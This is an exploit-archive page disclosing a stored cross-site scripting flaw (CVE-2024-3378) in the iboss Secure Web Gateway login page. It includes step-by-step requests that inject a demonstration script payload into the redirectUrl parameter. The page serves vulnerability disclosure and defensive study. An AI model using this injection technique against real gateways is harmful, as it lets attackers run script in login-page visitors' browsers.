exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

iboss Secure Web Gateway Cross Site Scripting

iboss Secure Web Gateway Cross Site Scripting
Posted May 9, 2024
Authored by modrnProph3t

iboss Secure Web Gateway versions prior to 10.2.0 suffer from a persistent cross site scripting vulnerability.

tags | exploit, web, xss
advisories | CVE-2024-3378
SHA-256 | 50b166bd6a6b50ebc0b7770cf33221a56eafab69e5b4987b101fcd6a8a6d1e49

iboss Secure Web Gateway Cross Site Scripting

Change Mirror Download
# Exploit Title: iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)
# Date: 4/4/2024
# Exploit Author: modrnProph3t
# Vendor Homepage: https://www.iboss.com
# Version: < 10.2.0
# CVE-2024-3378
# Reference: https://github.com/modrnProph3t/CVE/blob/main/CVE-2024-3378.md


## Description
A stored Cross Site Scripting (XSS) vulnerability was found in the iboss Secure Web Gateway product. The vulnerability is exploited by submitting a login attempt, intercepting the request, and adding a payload to the ÒredirectUrlÓ parameter before sending it to the server. After submitting the request, visiting the initial login page will cause the website to load, including the previously submitted payload.

This is an unauthenticated attack (credentials do not need to be valid) and the payload is stored on the server and included in every response to a GET request for the login page until a new POST request is made to the server without a payload included.

## Proof of Conept
1. Access the login portal located at /login


2. Submit login attempt and intercept the request

Example of unaltered request:
```
POST /user_login_submit HTTP/1.1
Host: <domain>
<--Headers Removed-->

userName=TEST&x=TEST&action=login&redirectUrl=
```


3. Insert XSS payload into the "redirectUrl" parameter

Example of request with inserted payload:
```
POST /user_login_submit HTTP/1.1
Host: <domain>
<--Headers Removed-->

userName=TEST&x=TEST&action=login&redirectUrl="><script>alert('XSS')</script>
```


4. After failed login attempt, return to the initial login page at the /login endpoint and observe payload execution

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close